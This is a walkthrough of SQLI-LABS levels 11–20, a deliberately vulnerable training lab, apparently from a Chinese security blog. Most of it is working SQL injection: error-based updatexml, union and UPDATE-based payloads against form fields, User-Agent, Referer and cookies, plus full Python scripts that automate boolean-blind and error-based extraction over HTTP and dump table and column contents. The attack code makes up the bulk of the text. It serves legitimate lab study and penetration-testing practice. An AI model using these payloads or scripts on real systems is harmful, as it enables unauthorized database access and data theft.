SQLI-LABS Page1 11-20
阿新 • Published: 2020-12-27
0x0B Less-11
Error-based injection; the only difference is that the input arrives via POST. The error-reporting functions can be used directly, or the usual union approach.
- Error-based injection; swap the inner query for each step:
uname=admin' and updatexml(1,concat(0x7e,(database()),0x7e),1)#&passwd=123&submit=Submit
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#&passwd=123&submit=Submit
uname=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)#&passwd=123&submit=Submit
- Regular (union) injection; the page echoes two columns, so the union supplies two:
uname=admin' order by 2#&passwd=123&submit=Submit
uname=' union select database(),(select group_concat(table_name) from information_schema.tables where table_schema=(database()))#&passwd=123&submit=Submit
uname=' union select database(),(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')#&passwd=123&submit=Submit
0x0C Less-12
The error message shows the closing delimiter is "), the rest is the same as Less-11.
0x0D Less-13
The error message shows the delimiter is ').
Error-based injection works directly. Because the page does not echo the queried columns, union injection shows nothing, so boolean blind injection is the other option.
- Boolean blind injection (the failed-login page carries slap.jpg; the script uses that as the false/true oracle)
import requests

url = "http://192.168.44.214/sqli-labs/Less-13/"
_columns = []
_tables = []
_database = ""
resolver = "')"          # closes the ('...') around uname in Less-13; change this per level
data = {
    "uname": "1",
    "passwd": "123",
    "submit": "Submit"
}


def binarySearch(payload):
    # payload is an integer-valued SQL expression; each round asks "expression > middle?".
    # slap.jpg means the login failed, i.e. the OR-ed condition was false.
    maxn = 144           # upper bound for the length / ASCII code being searched;
    minn = 1             # a group_concat longer than 144 chars will be cut off here
    while minn <= maxn:
        middle = (maxn + minn) // 2
        payload1 = payload + ">" + str(middle) + "#"
        data['uname'] = payload1
        r = requests.post(url, data=data)
        if "slap.jpg" in r.text:
            maxn = middle - 1
        else:
            minn = middle + 1
    return minn


def getLength(func):
    payload1 = resolver + " or length({})".format(func)
    return binarySearch(payload1)


def getStr(func, length):
    # recover the string one character at a time via ascii(substr(...))
    mstr = ""
    for i in range(1, length + 1):
        payload = resolver + " or ascii(substr({},{},1))".format(func, i)
        mstr += chr(binarySearch(payload))
    return mstr


def getDatabase():
    global _database
    func = "database()"
    result = getStr(func, getLength(func))
    print("[*] database: " + result)
    _database = result


def getTableNum(database):   # kept from the original; not called by main
    func = "(select count(table_name) from information_schema.tables where table_schema='{}')".format(database)
    result = getStr(func, getLength(func))
    print("[*] table num = " + result)


def getTables(database):
    global _tables
    func = "(select group_concat(table_name) from information_schema.tables where table_schema='{}')".format(database)
    result = getStr(func, getLength(func))
    _tables = result.split(',')
    print("[*] tables: " + result)


def getColumns(table, database):
    global _columns
    func = "(select group_concat(column_name) from information_schema.columns where table_name='{}' and table_schema='{}')".format(table, database)
    result = getStr(func, getLength(func))
    _columns = result.split(",")
    print("[*] columns from {}: ".format(table) + result)


def getInformation(table, column):
    # dump every column of the table, then print the rows side by side
    Info = {}
    for i in column:
        func = "(select group_concat({}) from {})".format(i, table)
        result = getStr(func, getLength(func))
        Info[i] = result.split(',')
    for i in range(len(Info[column[0]])):
        mstr = ""
        for j in column:
            mstr += Info[j][i] + " "
        print(mstr)


if __name__ == "__main__":
    getDatabase()
    getTables(_database)
    getColumns(_tables[0], _database)
    getInformation(_tables[0], _columns)
0x0E Less-14
The error message shows the delimiter is ", and the script is the same as for the previous level.
0x0F Less-15
No error messages at all. The classic always-true login bypass gets in, so the Less-13 script can be used for boolean blind injection with the delimiter replaced by '.
0x10 Less-16
Change the delimiter in the Less-13 script to ").
0x11 Less-17
passwd produces errors, so error-based injection as in Less-11 works. There are other ways too: the UPDATE statement itself can be made to write the result of a subquery into a column, which is then read back (the author files this under second-order injection).
- Error-based injection
- Using the data update
When there is no error message, try injecting SQL into the UPDATE so that, once it executes, the data you want is stored in a column; reading that column then reveals it.
uname=admin&passwd=',password=database(),username='admin&submit=Submit
Submitting this stores the database name as admin's password. Then go to a level that displays the password column and read it out.
Full query:
uname=admin&passwd=',password=database(),username='admin&submit=Submit
Table names:
uname=admin&passwd=',password=substr((select group_concat(table_name) from information_schema.tables where table_schema=(database())),1,10),username='admin&submit=Submit
uname=admin&passwd=',password=substr((select group_concat(table_name) from information_schema.tables where table_schema=(database())),11,25),username='admin&submit=Submit
Column names and row data are fetched the same way as in the earlier levels. Note that the column can only hold a limited number of characters, so the result has to be retrieved in several substr pieces.
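To make the UPDATE-based write-then-read technique concrete, here is an added example (not from the original post) that runs the Less-17 statement shape against a throwaway SQLite database: the injected passwd closes the quote, assigns password a second time to a substr() window of the subquery, and re-opens a quote so the template's closing ' still matches. SQLite stands in for MySQL here; both apply the rightmost assignment when a column appears twice in SET. The subquery reads sqlite_master instead of information_schema.tables, and the users/emails/referers tables, their rows and the chunk width of 10 are constructed for the example.

```python
import sqlite3

# Statement shape the page describes for Less-17: uname is sanitised, passwd is pasted in as-is.
# (Constructed stand-in for the PHP code; not the lab's source.)
UPDATE_TEMPLATE = "UPDATE users SET password = '{passwd}' WHERE username='{uname}'"


def write_payload(expr, start, width):
    """passwd value that stores substr(expr, start, width) in admin's password.

    ' closes the open quote, password=... is a second assignment (rightmost wins),
    username='admin re-opens a quote so the template's trailing ' is consumed.
    """
    return f"',password=substr(({expr}),{start},{width}),username='admin"


def render_update(passwd, uname="admin"):
    """What the server ends up sending to the database for a given passwd value."""
    return UPDATE_TEMPLATE.format(passwd=passwd, uname=uname)


def make_db():
    """Constructed stand-in for the security database (in-memory SQLite, no server needed)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE emails(id INTEGER PRIMARY KEY, email_id TEXT);
        CREATE TABLE referers(id INTEGER PRIMARY KEY, referer TEXT, ip_address TEXT);
        INSERT INTO users(username, password) VALUES ('Dumb', 'Dumb'), ('admin', 'admin');
    """)
    return con


def exfiltrate(con, expr, width):
    """Write expr into admin's password `width` characters at a time and read each piece back.

    Stops at the first piece shorter than the window, i.e. when the value is exhausted.
    """
    chunks, start = [], 1
    while True:
        con.execute(render_update(write_payload(expr, start, width)))   # the vulnerable UPDATE
        piece = con.execute("SELECT password FROM users WHERE username='admin'").fetchone()[0] or ""
        chunks.append(piece)
        if len(piece) < width:
            return "".join(chunks)
        start += width


if __name__ == "__main__":
    db = make_db()
    # SQLite's equivalent of the page's group_concat(table_name) over information_schema.tables
    tables_expr = "select group_concat(name) from sqlite_master where type='table'"
    print(render_update(write_payload(tables_expr, 1, 10)))
    print("recovered:", exfiltrate(db, tables_expr, 10))
```

With a width of 10 the 21-character table list comes back in three pieces (10, 10 and 1 characters); the first piece shorter than the window is what ends the loop, so a value whose length is an exact multiple of the width costs one extra request that returns an empty string. The Dumb row is untouched because the WHERE clause is still username='admin'.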
0x12 Less-18
Log in with any account: the page displays the User-Agent. Changing the UA changes what is displayed, so this is probably UA injection.
A single quote in the UA produces an error, so error-based injection works. Note that in the source this value goes into an INSERT, so the remaining VALUES entries must be supplied and the parentheses closed.
payload:
1',1,updatexml(1,concat(0x7e,(database()),0x7e),1))#
0x13 Less-19
After logging in the page shows the Referer. A single quote in it produces an error; only the injection point has moved, the rest is the same as Less-18.
0x14 Less-20
After logging in, inspect the cookie.
A single quote in it produces an error; error-based injection retrieves the data.
Union injection (the query returns three columns, so the union supplies three):
Cookie: uname=admin1' order by 4#    (determine the column count)
Cookie: uname=adm' union select 1,2,database()#    (database name)
Cookie: uname=adm' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
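The manual updatexml payloads used for Less-11, Less-18 and Less-20 above share one caveat the page does not spell out: MySQL prints at most 32 characters of the offending XPath, so a group_concat() of table or column names is cut off after the first few entries. The script below is an added example (not from the original post) that automates the error-based technique for those three levels and works around the limit with a sliding substr() window. The host is copied from the page's Less-13 script; the templates, the admin/admin login used for Less-18, the assumption that mysql_error() is echoed unescaped, and the fake_db() stand-in are all assumptions of this example.

```python
import re

# Host taken from the page's Less-13 script; change the level path before running live.
URL = "http://192.168.44.214/sqli-labs/Less-11/"

# Where the probe lands in each level's statement; {} is replaced by the updatexml() call.
#   Less-11 / Less-20:  ... WHERE username='$x' ...               -> close the quote, AND the probe, comment the rest
#   Less-18:            INSERT ... VALUES ('$uagent', '$IP', $uname) -> supply the other two values, close the ()
TEMPLATES = {
    "less11": "admin' and {}#",
    "less18": "1',1,{})#",
    "less20": "admin' and {}#",
}

# MySQL shows at most 32 characters of the bad XPath in the error; one is spent on the
# 0x7e marker, so each request can leak 31 characters of the value.
WIDTH = 31
# Assumes the lab echoes mysql_error() verbatim, so the quotes survive in the HTML.
ERR_RE = re.compile(r"XPATH syntax error: '~(.*?)'")


def build_payload(template, expr, start=1, width=WIDTH):
    """Wrap a SQL expression so that one substr() window of its value lands in the XPATH error."""
    probe = f"updatexml(1,concat(0x7e,substr(({expr}),{start},{width})),1)"
    return template.format(probe)


def parse_error(html):
    """Text between the 0x7e marker and the closing quote of the error, or None if no error came back."""
    m = ERR_RE.search(html)
    return m.group(1) if m else None


def extract(template, expr, fetch, width=WIDTH):
    """Slide the substr() window forward until a chunk shorter than the window comes back."""
    value, start = "", 1
    while True:
        chunk = parse_error(fetch(build_payload(template, expr, start, width)))
        if chunk is None:
            raise RuntimeError("no XPATH error in the response: wrong delimiter, or the level is not error-based")
        value += chunk
        if len(chunk) < width:
            return value
        start += width


# --- live transports, one per injection point (network only when called) --------------------

def live_fetch_less11(payload):
    """Less-11: payload rides in the POST body, the page's own form fields."""
    import requests
    return requests.post(URL, data={"uname": payload, "passwd": "123", "submit": "Submit"}).text


def live_fetch_less18(payload):
    """Less-18: payload rides in User-Agent; the INSERT only runs after a valid login (admin/admin assumed)."""
    import requests
    return requests.post(URL, data={"uname": "admin", "passwd": "admin", "submit": "Submit"},
                         headers={"User-Agent": payload}).text


def live_fetch_less20(payload):
    """Less-20: payload rides in the uname cookie of a request without the submit field."""
    import requests
    return requests.get(URL, cookies={"uname": payload}).text


# --- offline stand-in so the loop can be checked without the lab ---------------------------

def fake_db(value):
    """Constructed target: answers like MySQL would if the injected expression evaluated to `value`."""
    calls = []

    def fetch(payload):
        calls.append(payload)
        m = re.search(r",(\d+),(\d+)\)\),1\)", payload)          # pull start/width back out of the probe
        start, width = int(m.group(1)), int(m.group(2))
        window = value[start - 1:start - 1 + width]
        return f"<b>XPATH syntax error: '{('~' + window)[:32]}'</b>"   # MySQL's 32-char cut-off

    fetch.calls = calls
    return fetch


if __name__ == "__main__":
    tables = "emails,referers,uagents,users,extra_table"   # constructed 41-char sample value
    fetch = fake_db(tables)
    expr = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
    print(extract(TEMPLATES["less11"], expr, fetch))
    print(len(fetch.calls), "requests")
```

fake_db() is there so the chunking can be checked offline; swap in one of the live_fetch_* functions to run the same loop against the lab. The page's manual payloads wrap the value in 0x7e on both sides; the script keeps only the leading marker because ERR_RE uses it to find where the leaked value starts, which leaves the full 31 characters per request for data.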